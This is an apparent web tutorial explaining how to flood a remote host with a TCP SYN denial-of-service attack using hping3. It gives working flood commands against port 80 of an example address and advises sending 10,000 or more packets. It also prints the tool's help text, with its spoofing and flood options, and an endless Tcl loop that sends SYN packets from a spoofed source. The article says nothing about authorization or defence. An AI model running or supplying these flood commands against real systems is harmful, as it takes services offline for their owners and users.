Tcp Syn flood DOS attack with Hping

Hping

Hping is a command line tool that can be used to generate packets on the network for scanning and diagnosis purpose. Its similar to the ping command that generates and sends icmp packets to a remote host to check if its alive or not.

But hping has more features. Besides icmp, it can also generate tcp, udp and raw packets, which makes it a useful security tool to test and audit systems on a network.

The ability to generate various kinds of packets is what makes hping so useful. For example icmp packets can be used for ping discovery and traceroute. Raw tcp and udp packets can be used for tasks like port scanning.

Wikipedia defines hping as:

hping is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as Antirez). Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

In this article we shall take a quick look at how to use the hping command to generate tcp syn packets and flood a remote host with a DOS (Denial-of-Service) attack.

Install Hping

On Ubuntu based systems (and similar distros like Linux Mint, Elementary OS) hping can be installed from synaptic manager. The package name is hping3.

$ sudo apt-get install hping3

Syn flood with hping

Now that you have installed hping, its time to generate and send tcp syn packets.
To send syn packets use the following command at terminal

$ sudo hping3 -i u1 -S -p 80 192.168.1.1

The above command would send TCP SYN packets to 192.168.1.1

sudo is necessary since the hping3 create raw packets for the task , for raw sockets/packets root privilege is necessary on Linux.

S - indicates SYN flag
p 80 - Target port 80
i u1 - Wait for 1 micro second between each packet

More options

Use the "-c" option to set the count of packets to be send. To flood a remote host you can send say 10,000 packets or more.

c - indicates the number of packets to send/receive

$ sudo hping3 -i u1 -S -p 80 -c 10  192.168.1.1 
HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0 data bytes

--- 192.168.1.1 hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Use the "-help" option to see what options are available for use.
Here is a sample output of the help option:

$ hping3 -help
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood      sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
IP
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set don't fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-mss        enable the TCP MSS option with the given value
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt       Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send       Send the packet described with APD (see docs/APD.txt)
$

Packet crafting with hping

As of version 3 hping now is scriptable using Tcl language and also has a shell for interactive commands.

It can be used to craft packets by specifying various options like flags, port number etc. This is useful if you need to set individual fields in the packet to specific values.

The following example shows a one line code that sends syn packets:

$ sudo hping3
hping3> while {1} { hping send "ip(saddr=1.2.3.4,daddr=192.168.1.1)+tcp(sport=4231,dport=80,flags=s)" }
^Z
[2]+  Stopped                 sudo hping3
$

Press Ctrl+C to stop.

The above method allows for easier human readable packet crafting.

Conclusion

If you want to see the packets generated by hping use Wireshark to detect and analyse the packets. Wireshark is a powerful gui tool to sniff packets and traffic on the network and present them in easy to read format.

You can also code your own syn flood program in C, python or perl. It requires knowledge of socket programming.

Resources and Links

Check out the official website of hping here:
http://www.hping.org/

For a quick introduction and guide check the wiki page:
http://wiki.hping.org/94